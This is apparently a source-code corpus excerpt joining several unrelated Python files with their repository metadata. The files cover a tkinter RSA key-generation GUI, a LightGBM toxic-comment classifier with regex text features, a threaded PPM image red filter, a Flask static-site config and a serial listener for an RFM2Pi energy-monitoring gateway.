# # print(Y_train.shape)
# # target_test_convert = np_utils.to_categorical(target_test, NUM_CLASS)
#
# #test
# # print("X_test")
# # print(X_test.shape)
# # Y_test = np.array(Y_test)
# # print("Y_test")
# # print(Y_test.shape)
#
# # print("hidden_num:{},batch_size: {}".format(hidden_num,batch_size))
# # print("-------------------------------------------------------------------")
# while(epoch < 40):
# k = 0
#
# for (index,data) in enumerate(cnn_train_result, start= 0 ):
# if(index >= (epoch) * batch_size and index < (epoch+1) * batch_size):
# # if (index >= (epoch ) * batch_size and index < (epoch +1) * batch_size):
# # print(data.shape)
# data_container.append(data)
# k += 1
# if k == batch_size:
# break
# # print(data_container.shape)
#
# j = 0
# for (index1,target) in enumerate(y_train, start= 0):
# if (index1 >= (epoch) * batch_size and index1 < (epoch + 1) * batch_size):
# # if (index >= (epoch) * batch_size and index < (epoch + 1) * batch_size):
# target_container.append(target)
# j += 1
# if j == batch_size:
# break
# # print(target_container)
# data_container = np.array(data_container)
#
# target_container = np.array(target_container)
# target_container = target_container[:, np.newaxis] # reshape the 1-D (32,) array into 2-D (32, 1)
#
#
# elm.train(data_container, target_container)
# # elm.test(data_container, target_container)
# # # elm.test(X_test, Y_test)
# y_test = y_test[:, np.newaxis]
# elm.test(cnn_test_result, y_test)
# # # elm.test(data_container, target_container)
#
#
# # print(epoch)
# epoch += 1
# data_container = []
# target_container = []
# # hidden_num = 10 + hidden_num;
# # print(hidden_num)
|
[
"2281444815@qq.com"
] |
2281444815@qq.com
|
7b5c26327d7571b858c464c09b47679881449f01
|
e237724f4448c5789915e4a85a44db3028b16ac1
|
/GUI/GUI.py
|
dd459aa8845104963ddde87096209549583d62bc
|
[] |
no_license
|
HugoAhoy/RSA
|
9dc7e47235f50aa0c7994b160520095b6f90bf47
|
64d3feb973628adb6ab9bb46ca470ee94a1d33a7
|
refs/heads/main
| 2023-09-01T04:28:43.813878
| 2021-11-08T08:59:46
| 2021-11-08T08:59:46
| 418,938,432
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,399
|
py
|
from tkinter import *
from tkinter.ttk import *
from methods import *
from subprocess import Popen
from subprocess import PIPE
p = Popen("GUI/RSA.exe", stdin=PIPE, stdout=PIPE)
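# the RSA arithmetic runs in an external process; the GUI exchanges data with it over stdin/stdout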
# Create the main window
window = Tk()
window.title("RSA")
window.geometry("800x600")
# Create the notebook tab pages
tab = Notebook(window)
frame1 = Frame(tab)
tab1 = tab.add(frame1, text = "密钥生成")
frame2 = Frame(tab)
tab2 = tab.add(frame2, text = "加密")
frame3 = Frame(tab)
tab3 = tab.add(frame3, text = "解密")
tab.pack(padx=5,pady=5,expand = True, fill = BOTH)
# Select tab1 (key generation) by default
tab.select(frame1)
# Widgets for the key-generation tab
RSA_length = Label(frame1, text = "加密等级: ")
level_combo = Combobox(frame1)
level_combo['values'] = ("RSA-256","RSA-512","RSA-768","RSA-1024","RSA-2048")
level_combo.current(1)
priv_label = Label(frame1, text="私钥D: ")
priv_content =Label(frame1,wraplength=260)
pub_n_label = Label(frame1, text="公钥N: ")
pub_n_content =Label(frame1,wraplength=260)
pub_e_label = Label(frame1, text="公钥E: ")
pub_e_content =Label(frame1,wraplength=260)
gen_btn = Button(frame1, text="生成",command=lambda: generate_key(p,level_combo,pub_n_content,pub_e_content,priv_content))
save_btn = Button(frame1, text="保存",command=lambda: save_keys(pub_n_content,pub_e_content,priv_content))
# Widgets for the encryption tab
en_public_n_label = Label(frame2, text = "公钥N: ")
en_public_n_Content = Label(frame2,wraplength=260)
en_public_e_label = Label(frame2, text = "公钥E: ")
en_public_e_Content = Label(frame2,wraplength=260)
en_cwe_label = Label(frame2, text = "明文: ")
en_content_without_encrypt = Text(frame2, height=5) # create a text box widget and set its height
en_ce_label = Label(frame2, text = "密文: ")
en_content_encrypt = Text(frame2, height=5) # create a text box widget and set its height
en_open_privkey_btn = Button(frame2, text="打开公钥",command=lambda: read_public_key(en_public_n_Content, en_public_e_Content))
en_encrypt_btn = Button(frame2, text="加密", command=lambda: encrypt(en_public_e_Content,en_public_n_Content,en_content_without_encrypt, en_content_encrypt))
# Widgets for the decryption tab
de_public_n_label = Label(frame3, text = "公钥N: ")
de_public_n_Content = Label(frame3,wraplength=260)
de_priv_d_label = Label(frame3, text = "私钥D: ")
de_priv_d_Content = Label(frame3,wraplength=260)
de_cwe_label = Label(frame3, text = "明文: ")
de_content_without_encrypt = Text(frame3, height=5) # create a text box widget and set its height
de_ce_label = Label(frame3, text = "密文: ")
de_content_encrypt = Text(frame3, height=5) # create a text box widget and set its height
de_open_privkey_btn = Button(frame3, text="打开私钥",command=lambda: read_private_key(de_public_n_Content, de_priv_d_Content))
de_encrypt_btn = Button(frame3, text="解密", command=lambda: decrypt(de_priv_d_Content,de_public_n_Content,de_content_encrypt, de_content_without_encrypt))
# Layout for the key-generation tab
RSA_length.grid(column=1, row=0,sticky='w')
level_combo.grid(column=2, row=0)
priv_label.grid(column=0, row=3,sticky='n')
priv_content.grid(column=1, row=3,columnspan=4)
pub_n_label.grid(column=0, row=5,sticky='n')
pub_n_content.grid(column=1, row=5,columnspan=4)
pub_e_label.grid(column=0, row=7,sticky='n')
pub_e_content.grid(column=1, row=7,columnspan=4)
gen_btn.grid(column=3, row=0,sticky='w')
save_btn.grid(column=4, row=0,sticky='w')
# Layout for the encryption tab
en_public_n_label.grid(column=0, row=1,sticky='n')
en_public_n_Content.grid(column=1, row=1)
en_public_e_label.grid(column=0, row=2,sticky='n')
en_public_e_Content.grid(column=1, row=2)
en_cwe_label.grid(column=0,row=4)
en_content_without_encrypt.grid(column=1,row=4, columnspan=2)
en_ce_label.grid(column=0,row=5)
en_content_encrypt.grid(column=1,row=5, columnspan=2)
en_open_privkey_btn.grid(column=1, row=0)
en_encrypt_btn.grid(column=2, row=0)
# Layout for the decryption tab
de_public_n_label.grid(column=0, row=1,sticky='n')
de_public_n_Content.grid(column=1, row=1)
de_priv_d_label.grid(column=0, row=2,sticky='n')
de_priv_d_Content.grid(column=1, row=2)
de_cwe_label.grid(column=0,row=4)
de_content_without_encrypt.grid(column=1,row=4, columnspan=2)
de_ce_label.grid(column=0,row=5)
de_content_encrypt.grid(column=1,row=5, columnspan=2)
de_open_privkey_btn.grid(column=1, row=0)
de_encrypt_btn.grid(column=2, row=0)
window.mainloop()
|
[
"zhjd3302@outlook.com"
] |
zhjd3302@outlook.com
|
2942ff8ebf61167582d61aba9c9506af64a8120e
|
3ec14117e72329ae8bfa174f1eae92433ebc6bd6
|
/toxic_comments/lgbm.py
|
7e9613b295d49674688d3d84ff63944a36166f77
|
[] |
no_license
|
Matafight/Kaggle
|
cd2dd5d0f9e5e52aba2c1c7afdac00a3860303d8
|
1ef5a44056afdfb7f5997dbde46416600f368045
|
refs/heads/master
| 2021-01-21T01:46:42.165350
| 2019-03-10T08:44:07
| 2019-03-10T08:44:07
| 56,367,062
| 7
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 10,704
|
py
|
#_*_coding:utf-8_*_
import sys
sys.path.append('..')
#sys.path.append('../kaggle_methods')
from dm_methods.kaggle_methods.ridge import ridge_cv
from dm_methods.kaggle_methods.xgboost_classification import xgboost_classification_cv
from dm_methods.kaggle_methods.logistic_regression import LogisticRegression_CV
from dm_methods.kaggle_methods.svc import SVC_CV
from dm_methods.kaggle_methods.nb_classification import GaussianNB_CV
from dm_methods.kaggle_methods.random_forest_classification import RandomForest_CV
from dm_methods.kaggle_methods.lightgbm_classification import lightgbm_CV
#from ridge import ridge_cv
from sklearn import metrics
import re
import time
from scipy.sparse import csr_matrix
from sklearn.preprocessing import MinMaxScaler
import gc
from contextlib import contextmanager
import string
from scipy.sparse import hstack
from sklearn.feature_extraction.text import TfidfVectorizer
class Timer:
def __enter__(self):
self.start = time.clock()
return self
def __exit__(self, *args):
self.end = time.clock()
self.interval = self.end - self.start
@contextmanager
def timer(name):
"""
Taken from Konstantin Lopuhin https://www.kaggle.com/lopuhin
in script named : Mercari Golf: 0.3875 CV in 75 LOC, 1900 s
https://www.kaggle.com/lopuhin/mercari-golf-0-3875-cv-in-75-loc-1900-s
"""
t0 = time.time()
yield
print(name+' done in {} s'.format(time.time()-t0))
# Load and preprocess the data
import numpy as np # linear algebra
import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)
df_train = pd.read_csv('./input/train.csv').fillna(" ")
df_test = pd.read_csv('./input/test.csv').fillna(" ")
df_train = df_train.loc[:1000,:]
df_test = df_test.loc[:1000,:]
label_name = ['toxic','severe_toxic','obscene','threat','insult','identity_hate']
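# the six toxicity labels to be predicted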
train_label = df_train[label_name]
#df_all = pd.concat([df_train[['id','comment_text']],df_test],axis=0)
#add on 2018/3/5
# Contraction replacement patterns
cont_patterns = [
('(W|w)on\'t', 'will not'),
('(C|c)an\'t', 'can not'),
('(I|i)\'m', 'i am'),
('(A|a)in\'t', 'is not'),
('(\w+)\'ll', '\g<1> will'),
('(\w+)n\'t', '\g<1> not'),
('(\w+)\'ve', '\g<1> have'),
('(\w+)\'s', '\g<1> is'),
('(\w+)\'re', '\g<1> are'),
('(\w+)\'d', '\g<1> would'),
]
patterns = [(re.compile(regex), repl) for (regex, repl) in cont_patterns]
def prepare_for_char_n_gram(text):
""" Simple text clean up process"""
# 1. Go to lower case (only good for english)
# Go to bytes_strings as I had issues removing all \n in r""
clean = text
# 2. Drop \n and \t
clean = clean.replace("\n", " ")
clean = clean.replace("\t", " ")
clean = clean.replace("\b", " ")
clean = clean.replace("\r", " ")
# 3. Replace english contractions
for (pattern, repl) in patterns:
clean = re.sub(pattern, repl, clean)
# 4. Drop puntuation
# I could have used regex package with regex.sub(b"\p{P}", " ")
exclude = re.compile('[%s]' % re.escape(string.punctuation))
clean = " ".join([exclude.sub('', token) for token in clean.split()])
# 5. Drop numbers - as a scientist I don't think numbers are toxic ;-)
clean = re.sub("\d+", " ", clean)
# 6. Remove extra spaces - At the end of previous operations we multiplied space accurences
clean = re.sub('\s+', ' ', clean)
# Remove ending space if any
clean = re.sub('\s+$', '', clean)
# 7. Now replace words by words surrounded by # signs
# e.g. my name is bond would become #my# #name# #is# #bond#
# clean = re.sub(b"([a-z]+)", b"#\g<1>#", clean)
clean = re.sub(" ", "# #", clean) # Replace space
clean = "#" + clean + "#" # add leading and trailing #
return clean
def count_regexp_occ(regexp="", text=None):
""" Simple way to get the number of occurence of a regex"""
return len(re.findall(regexp, text))
def char_analyzer(text):
"""
This is used to split strings in small lots
I saw this in an article (I can't find the link anymore)
so <talk> and <talking> would have <Tal> <alk> in common
"""
tokens = text.split()
return [token[i: i + 3] for token in tokens for i in range(len(token) - 2)]
def get_indicators_and_clean_comments(df):
"""
Check all sorts of content as it may help find toxic comment
Though I'm not sure all of them improve scores
"""
# Count number of \n
df["ant_slash_n"] = df["comment_text"].apply(lambda x: count_regexp_occ(r"\n", x))
# Get length in words and characters
df["raw_word_len"] = df["comment_text"].apply(lambda x: len(x.split()))
df["raw_char_len"] = df["comment_text"].apply(lambda x: len(x))
# Check number of upper case, if you're angry you may write in upper case
df["nb_upper"] = df["comment_text"].apply(lambda x: count_regexp_occ(r"[A-Z]", x))
# Number of F words - f..k contains folk, fork,
df["nb_fk"] = df["comment_text"].apply(lambda x: count_regexp_occ(r"[Ff]\S{2}[Kk]", x))
# Number of S word
df["nb_sk"] = df["comment_text"].apply(lambda x: count_regexp_occ(r"[Ss]\S{2}[Kk]", x))
# Number of D words
df["nb_dk"] = df["comment_text"].apply(lambda x: count_regexp_occ(r"[dD]ick", x))
# Number of occurence of You, insulting someone usually needs someone called : you
df["nb_you"] = df["comment_text"].apply(lambda x: count_regexp_occ(r"\W[Yy]ou\W", x))
# Just to check you really refered to my mother ;-)
df["nb_mother"] = df["comment_text"].apply(lambda x: count_regexp_occ(r"\Wmother\W", x))
# Just checking for toxic 19th century vocabulary
df["nb_ng"] = df["comment_text"].apply(lambda x: count_regexp_occ(r"\Wnigger\W", x))
# Some Sentences start with a <:> so it may help
df["start_with_columns"] = df["comment_text"].apply(lambda x: count_regexp_occ(r"^\:+", x))
# Check for time stamp
df["has_timestamp"] = df["comment_text"].apply(lambda x: count_regexp_occ(r"\d{2}|:\d{2}", x))
# Check for dates 18:44, 8 December 2010
df["has_date_long"] = df["comment_text"].apply(lambda x: count_regexp_occ(r"\D\d{2}:\d{2}, \d{1,2} \w+ \d{4}", x))
# Check for date short 8 December 2010
df["has_date_short"] = df["comment_text"].apply(lambda x: count_regexp_occ(r"\D\d{1,2} \w+ \d{4}", x))
# Check for http links
df["has_http"] = df["comment_text"].apply(lambda x: count_regexp_occ(r"http[s]{0,1}://\S+", x))
# check for mail
df["has_mail"] = df["comment_text"].apply(
lambda x: count_regexp_occ(r'[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+', x)
)
# Looking for words surrounded by == word == or """" word """"
df["has_emphasize_equal"] = df["comment_text"].apply(lambda x: count_regexp_occ(r"\={2}.+\={2}", x))
df["has_emphasize_quotes"] = df["comment_text"].apply(lambda x: count_regexp_occ(r"\"{4}\S+\"{4}", x))
# Now clean comments
df["clean_comment"] = df["comment_text"].apply(lambda x: prepare_for_char_n_gram(x))
# Get the new length in words and characters
df["clean_word_len"] = df["clean_comment"].apply(lambda x: len(x.split()))
df["clean_char_len"] = df["clean_comment"].apply(lambda x: len(x))
# Number of different characters used in a comment
# Using the f word only will reduce the number of letters required in the comment
df["clean_chars"] = df["clean_comment"].apply(lambda x: len(set(x)))
df["clean_chars_ratio"] = df["clean_comment"].apply(lambda x: len(set(x))) / df["clean_comment"].apply(
lambda x: 1 + min(99, len(x)))
get_indicators_and_clean_comments(df_train)
get_indicators_and_clean_comments(df_test)
with timer("Creating numerical features"):
num_features = [f_ for f_ in df_train.columns
if f_ not in ["comment_text", "clean_comment", "id", "remaining_chars",
'has_ip_address'] + label_name]
skl = MinMaxScaler()
train_num_features = csr_matrix(skl.fit_transform(df_train[num_features]))
test_num_features = csr_matrix(skl.fit_transform(df_test[num_features]))
# Get TF-IDF features
train_text = df_train['clean_comment']
test_text = df_test['clean_comment']
all_text = pd.concat([train_text, test_text])
# First on real words
with timer("Tfidf on word"):
word_vectorizer = TfidfVectorizer(
sublinear_tf=True,
strip_accents='unicode',
analyzer='word',
token_pattern=r'\w{1,}',
stop_words='english',
ngram_range=(1, 2),
max_features=20000)
word_vectorizer.fit(all_text)
train_word_features = word_vectorizer.transform(train_text)
test_word_features = word_vectorizer.transform(test_text)
del word_vectorizer
gc.collect()
with timer("Tfidf on char n_gram"):
char_vectorizer = TfidfVectorizer(
sublinear_tf=True,
strip_accents='unicode',
tokenizer=char_analyzer,
analyzer='word',
ngram_range=(1, 1),
max_features=50000)
char_vectorizer.fit(all_text)
train_char_features = char_vectorizer.transform(train_text)
test_char_features = char_vectorizer.transform(test_text)
del char_vectorizer
gc.collect()
print((train_char_features > 0).sum(axis=1).max())
del train_text
del test_text
gc.collect()
# Now stack TF IDF matrices
with timer("Staking matrices"):
csr_trn = hstack(
[
train_char_features,
train_word_features,
train_num_features
]
).tocsr()
# del train_word_features
del train_num_features
del train_char_features
gc.collect()
csr_sub = hstack(
[
test_char_features,
test_word_features,
test_num_features
]
).tocsr()
# del test_word_features
del test_num_features
del test_char_features
gc.collect()
submissions = pd.DataFrame.from_dict({'id': df_test['id']})
del df_test
gc.collect()
# now the training data
training = csr_trn
testing = csr_sub
import lightgbm as lgb
from lightgbm import LGBMModel
##get label
#label = df_train['toxic']
#
#train_data = lgb.Dataset(training,label = label)
#test_data = lgb.Dataset(testing)
#
##setting parameters
#param = {'num_leaves':31, 'objective':'binary'}
#param['metric'] = 'auc'
#num_round = 10
#bst = lgb.train(param, train_data, num_boost_round=num_round)
#print(bst.current_iteration())
#param['num_round'] = 20
#bst2 = lgb.train(param,train_data)
#print(bst2.current_iteration())
metric = metrics.log_loss
scoring = 'roc_auc'
metric_name = 'auc'
lgb_cls = lightgbm_CV(training.toarray(),df_train['toxic'],metric,metric_name=metric_name,scoring = scoring)
lgb_model = lgb_cls.cross_validation()
|
[
"guo_sc@foxmail.com"
] |
guo_sc@foxmail.com
|
4431d8c61a1bc8a36d28b03b20d34c0795ab0e84
|
6e7e1a23a96d7fc591cb33b230cc0d824cc84f40
|
/main/_config.py
|
9a3837f330c8caba03cc125daac315b775006896
|
[
"MIT"
] |
permissive
|
vprnet/town-meeting-day-2017
|
a1f8a0d8c2f90f14160053a5cda4b3ba68cea3cc
|
bc3f116995eb63f69aa89319554c3b5d235ac491
|
refs/heads/master
| 2020-05-30T09:18:10.813376
| 2017-03-07T13:24:24
| 2017-03-07T13:24:24
| 83,593,426
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 731
|
py
|
import os
import inspect
# Flask
DEBUG = True
# Amazon S3 Settings
AWS_KEY = ''
AWS_SECRET_KEY = ''
AWS_BUCKET = 'www.vpr.net'
# AWS_DIRECTORY = 'apps/town-meeting-day-2017/'
AWS_DIRECTORY = 'sandbox/town-meeting-day-2017/'
# Cache Settings (units in seconds)
STATIC_EXPIRES = 60 * 24 * 3600
HTML_EXPIRES = 3600
# Frozen Flask
FREEZER_DEFAULT_MIMETYPE = 'text/html'
FREEZER_IGNORE_MIMETYPE_WARNINGS = True
FREEZER_DESTINATION = 'build'
FREEZER_BASE_URL = 'http://%s/%s' % (AWS_BUCKET, AWS_DIRECTORY)
FREEZER_STATIC_IGNORE = ['Gruntfile*', 'node_modules', 'package.json',
'dev', '.sass-cache']
WEBFACTION_PATH = AWS_DIRECTORY
ABSOLUTE_PATH = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe()))) + '/'
|
[
"smbsimon@gmail.com"
] |
smbsimon@gmail.com
|
1de2fbb21ed15fac11022e56de6f6af56a44d490
|
85c90c5169f301e9528d3cda82344cdfa0acecec
|
/alumnos/58018-Valentin-Faraz/sv/hilos.py
|
5a3a2c6c624f2b1c512053d913b9844d0ec37212
|
[] |
no_license
|
valefaraz/lab
|
18836e4fa6e9827d42fde72eab98b1f4d07a884a
|
607cd9cb69d81da798773f0e6353c1a3abd1d1c2
|
refs/heads/master
| 2021-04-14T20:42:42.056332
| 2020-11-02T21:06:20
| 2020-11-02T21:06:20
| 249,264,906
| 0
| 0
| null | 2020-03-22T20:17:04
| 2020-03-22T20:17:03
| null |
UTF-8
|
Python
| false
| false
| 2,143
|
py
|
import os
from itertools import islice
from concurrent import futures
import time
from math import ceil
intensidad = 1
body_list = []
size=0
class Filtros_ppm():
def separar(self,imagen_read):
header=""
for i in imagen_read.splitlines():
header += i.decode()+"\n"
if i == b"255":
break
#print(header)
#print(len(header))
#header = imagen_read[:15].decode()
header = header.replace("P6","P3")
#body = imagen_read[len(header):]
return(header)
def rojo(self,start):
#global intensidad
#global body_list
#print(start)
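# walk this chunk of the flat pixel list in RGB triplets: scale the red byte and zero the green and blue bytes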
for i in range(start, min(start + size, len(body_list)), 3):
body_list[i] = ceil(body_list[i] * intensidad)
if body_list[i] > 255:
body_list[i]= 255
body_list[i+1] = 0
body_list[i+2] = 0
#print (body_ppm)
#return(body_list)
if __name__ == "__main__":
f=Filtros_ppm()
fd = open("dog.ppm","rb")
lectura=fd.read()
header_ppm=f.separar(lectura)
#print(header_ppm)
fd.seek(len(header_ppm))
#print(body_list)
body= fd.read()
fd.close()
body_list = [x for x in body]
size=100000
while True:
if size%3 !=0:
size += 1
if size%3 == 0:
break
#print(size)
#file_size = os.stat("dog.ppm").st_size
#print(file_size)
size_body_list=len(body_list)
#print(size_body_list)
n_threads= ceil(size_body_list/size)
print(n_threads)
a=list(range(0,size_body_list,size))
print(a)
hilos = futures.ThreadPoolExecutor(max_workers=n_threads)
resultado_a_futuro = hilos.map(f.rojo, a)
list(resultado_a_futuro)  # consume the iterator so every worker finishes before the output image is built
#print ((resultado_a_futuro))
#print(len(body_list))
body_ppm =""
c=0
for x in body_list:
c += 1
body_ppm += str(x) + " "
if c%9 == 0:
body_ppm += "\n"
imagen = open("rojelio.ppm", "w")
imagen.write(header_ppm + "\n")
imagen.write(body_ppm)
#print(body_ppm)
#print(cabecera_ppm)
|
[
"valefaraz@gmail.com"
] |
valefaraz@gmail.com
|
a7a398a1310d6976ccc249d2a15dc9f7d6ce8245
|
0b0dab57f920f52e6757857a3e5535e38ce86762
|
/count_dups.py
|
b604beb16572e6f6fd095e214875d66aea621a87
|
[] |
no_license
|
andrewtdinh/CodingBatExercises
|
ca3ce8d684d462920795e53b318aa399c621d6b7
|
baa65b4c1f60655fc3c0136b90cfe7ea83a08dbe
|
refs/heads/master
| 2016-08-12T05:09:04.691706
| 2015-11-26T04:46:32
| 2015-11-26T04:46:32
| 45,966,147
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 159
|
py
|
def count_dups(arr):
#This function will count the number of duplicates for each unique element in a list
return [(x, arr.count(x)) for x in set(arr)]
|
[
"andrewdinh74@yahoo.com"
] |
andrewdinh74@yahoo.com
|
479596553756a7493a9c3ba0c552c344f5045724
|
5f584c4bd49cdc2a1a2ec168766bff0934287f25
|
/project/accomodations/views.py
|
9cd842ad3de9c0fa071de2159e4288573a5c254b
|
[] |
no_license
|
akanimmashaba/ecowebsphere
|
f73991b03f821bbef6e21865e8928af0df006263
|
26b8381d3ab8c21e3df290b3a978adc3bc11370b
|
refs/heads/main
| 2023-09-01T12:18:51.897913
| 2021-10-23T11:43:53
| 2021-10-23T11:43:53
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,705
|
py
|
from django.shortcuts import redirect, render,get_object_or_404
from django.urls.base import reverse
from django.views.generic import ListView, CreateView,UpdateView,DeleteView
from django.views.generic.detail import DetailView
from .models import Accomodation,Address, Application
# from accounts.models import Profile
from django.db.models import Q
from django.urls import reverse_lazy
from django.contrib.auth.decorators import login_required
from django.contrib.auth import get_user_model
from .forms import AccomodationForm, AddressForm
from django.http import HttpResponseRedirect, request
from django.utils import timezone
from django.http import request
class CreateAccomodationView(CreateView):
model = Accomodation
form_class = AccomodationForm
template_name = 'Create-accomodation.html'
success_url = reverse_lazy('dashboard')
class DeleteAccomodationView(DeleteView):
model = Accomodation
template_name = 'delete-accomodation.html'
success_url = reverse_lazy('my-accomodations')
class AccomodationUpdateView(UpdateView):
model = Accomodation
form_class = AccomodationForm
template_name = 'update-accomodation.html'
class CreateAddressView(CreateView): # new
model = Address
form_class = AddressForm
template_name = 'Create-address.html'
success_url = reverse_lazy('create-accomodation')
class AccomodationCreateView(CreateView):
model = Accomodation
template_name = "Create-accomodation.html"
def AccomodationsList(request):
context = {
'object': Accomodation.objects.all()
}
return render(request, 'accomodation-list.html', context)
@login_required
def MyAccomodations(request):
context = {
'accomodations': Accomodation.objects.all().filter(owner=request.user)
}
return render(request, 'my-accomodations.html', context)
@login_required
def ViewReport(request, pk):
accomodation = get_object_or_404(Accomodation, pk=pk)
# accomodation_applications as accom_apps
applied_accomodations = accomodation.applied.all()
context = {
'applied_accomodations':applied_accomodations,
}
return render(request, 'report-page.html', context)
class ApplicationDetail(DetailView):
model = Application
template_name = 'applications.html'
@login_required
def Apply(request, pk):
accomodation = get_object_or_404(Accomodation, id=request.POST.get('accomodation_id'))
applied = False
    if accomodation.applied.filter(id=request.user.id).exists():
accomodation.applied.remove(request.user)
applied = False
else:
accomodation.applied.add(request.user)
applied = True
return HttpResponseRedirect(reverse('accomodation-detail', args=[str(pk)]))
class AccomodationList(ListView):
model = Accomodation
paginate_by = 10
template_name = 'home.html'
class AccomodationDetail(DetailView):
model = Accomodation
template_name = 'accommodation-detail.html'
class SearchResultsView(ListView):
model = Accomodation
template_name = 'search_results.html'
context_object_name = 'results'
def get_queryset(self):
query = self.request.GET.get('q')
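# match the search term against the accommodation title and every address component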
object_list = Accomodation.objects.filter(
Q(title__icontains=query)
| Q(address__house_number__icontains=query)
| Q(address__street_name__icontains=query)
| Q(address__provice__icontains=query)
| Q(address__locality__icontains=query)
| Q(address__municipality__icontains=query)
| Q(address__postal_code__icontains=query))
return object_list
|
[
"80892148+am-mashaba@users.noreply.github.com"
] |
80892148+am-mashaba@users.noreply.github.com
|
2e7fdf3b346ff8e3b362ae8d71c14ffa1a47c8e6
|
344c9c0f94eb84cfdcb7027bc645028cb38cb9f8
|
/oemgatewaylistener.py
|
764f8df45242717e478f55509525aed01ae6a2be
|
[] |
no_license
|
MarquisT/oem_gateway
|
5debf34deabc708e79e0e449e2b467a6f23e6f01
|
bf9f3f694e8fa6fe019def786ebfdb1f7c1f66d5
|
refs/heads/master
| 2020-04-05T23:39:52.627486
| 2013-06-25T08:30:38
| 2013-06-25T08:30:38
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,001
|
py
|
"""
This code is released under the GNU Affero General Public License.
OpenEnergyMonitor project:
http://openenergymonitor.org
"""
import serial
import time, datetime
import logging
import re
"""class OemGatewayListener
Monitors a data source.
This almost empty class is meant to be inherited by subclasses specific to
their data source.
"""
class OemGatewayListener(object):
def __init__(self):
# Initialize logger
self._log = logging.getLogger("OemGateway")
def close(self):
"""Close socket."""
pass
def read(self):
"""Read data from socket and process if complete line received.
Return data as a list: [NodeID, val1, val2]
"""
pass
def set(self, **kwargs):
"""Set configuration parameters.
**kwargs (dict): settings to be sent. Example:
{'setting_1': 'value_1', 'setting_2': 'value_2'}
"""
pass
def run(self):
"""Placeholder for background tasks.
Allows subclasses to specify actions that need to be done on a
regular basis. This should be called in the main loop by the instantiator.
"""
pass
"""class OemGatewayRFM2PiListener
Monitors the serial port for data from RFM2Pi
"""
class OemGatewayRFM2PiListener(OemGatewayListener):
def __init__(self, com_port):
# Initialization
super(OemGatewayRFM2PiListener, self).__init__()
# Serial port
self._log.debug('Opening serial port: %s', com_port)
try:
self._ser = serial.Serial(com_port, 9600, timeout = 0)
except serial.SerialException as e:
self._log.error(e)
raise OemGatewayListenerInitError('Could not open COM port %s' %
com_port)
# Initialize RX buffer
self._rx_buf = ''
# Initialize settings
self._settings = {'baseid': '', 'frequency': '', 'sgroup': '',
'sendtimeinterval': ''}
# Initialize time update timestamp
self._time_update_timestamp = 0
def close(self):
"""Close socket."""
# Close serial port
if self._ser is not None:
self._log.debug("Closing serial port.")
self._ser.close()
def read(self):
"""Read data from socket and process if complete line received.
Return data as a list: [NodeID, val1, val2]
"""
# Read serial RX
self._rx_buf = self._rx_buf + self._ser.readline()
# If line incomplete, exit
if (self._rx_buf == '') or (self._rx_buf[len(self._rx_buf)-1] != '\n'):
return
# Otherwise, process line:
# Remove CR,LF
self._rx_buf = re.sub('\\r\\n', '', self._rx_buf)
# Log data
self._log.info("Serial RX: " + self._rx_buf)
# Get an array out of the space separated string
received = self._rx_buf.strip().split(' ')
# Empty serial_rx_buf
self._rx_buf = ''
# If information message, discard
if ((received[0] == '>') or (received[0] == '->')):
return
# Else, discard if frame not of the form
# [node val1_lsb val1_msb val2_lsb val2_msb ...]
# with number of elements odd and at least 3
elif ((not (len(received) & 1)) or (len(received) < 3)):
self._log.warning("Misformed RX frame: " + str(received))
# Else, process frame
else:
try:
received = [int(val) for val in received]
except Exception:
self._log.warning("Misformed RX frame: " + str(received))
else:
# Get node ID
node = received[0]
# Recombine transmitted chars into signed int
values = []
for i in range(1,len(received),2):
value = received[i] + 256 * received[i+1]
if value > 32768:
value -= 65536
values.append(value)
self._log.debug("Node: " + str(node))
self._log.debug("Values: " + str(values))
# Add data to send buffers
values.insert(0,node)
return values
def set(self, **kwargs):
"""Send configuration parameters to the RFM2Pi through COM port.
**kwargs (dict): settings to be modified. Available settings are
'baseid', 'frequency', 'sgroup'. Example:
{'baseid': '15', 'frequency': '4', 'sgroup': '210'}
"""
for key, value in kwargs.iteritems():
# If radio setting modified, transmit on serial link
if key in ['baseid', 'frequency', 'sgroup']:
if value != self._settings[key]:
self._settings[key] = value
self._log.info("Setting RFM2Pi | %s: %s" % (key, value))
string = value
if key == 'baseid':
string += 'i'
elif key == 'frequency':
string += 'b'
elif key == 'sgroup':
string += 'g'
self._ser.write(string)
# Wait a sec between two settings
time.sleep(1)
elif key == 'sendtimeinterval':
if value != self._settings[key]:
self._log.info("Setting send time interval to %s", value)
self._settings[key] = value
def run(self):
"""Actions that need to be done on a regular basis.
This should be called in main loop by instantiater.
"""
now = time.time()
# Broadcast time to synchronize emonGLCD
interval = int(self._settings['sendtimeinterval'])
if (interval): # A value of 0 means don't do anything
if (now - self._time_update_timestamp > interval):
self._send_time()
self._time_update_timestamp = now
def _send_time(self):
"""Send time over radio link to synchronize emonGLCD.
The radio module can be used to broadcast time, which is useful
to synchronize emonGLCD in particular.
Beware, this is known to garble the serial link on RFM2Piv1
sendtimeinterval defines the interval in seconds between two time
broadcasts. 0 means never.
"""
now = datetime.datetime.now()
self._log.debug("Broadcasting time: %d:%d" % (now.hour, now.minute))
self._ser.write("%02d,00,%02d,00,s" % (now.hour, now.minute))
"""class OemGatewayListenerInitError
Raise this when init fails.
"""
class OemGatewayListenerInitError(Exception):
pass
|
[
"jerome@antispam.fake"
] |
jerome@antispam.fake
|
a9429f499f86da380c35f20f7030daa4a35dd44d
|
d6ad0b5a7eb6dc621adc2d122378f8d39c6c041f
|
/app.py
|
d8d2548016a61a1c9c477f5ae33f952b3fc6d682
|
[] |
no_license
|
Praveen366/car_selling_prices
|
5917cc868ed6e02d22d6a31f4c16726dd291661a
|
b1d80734c62914ee05ae9f1af5e6f32014313166
|
refs/heads/master
| 2023-03-07T22:22:27.625174
| 2021-02-23T21:18:00
| 2021-02-23T21:18:00
| 341,679,337
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,971
|
py
|
# coding: utf-8
# In[ ]:
from flask import Flask, render_template, request, jsonify
import requests
import pickle
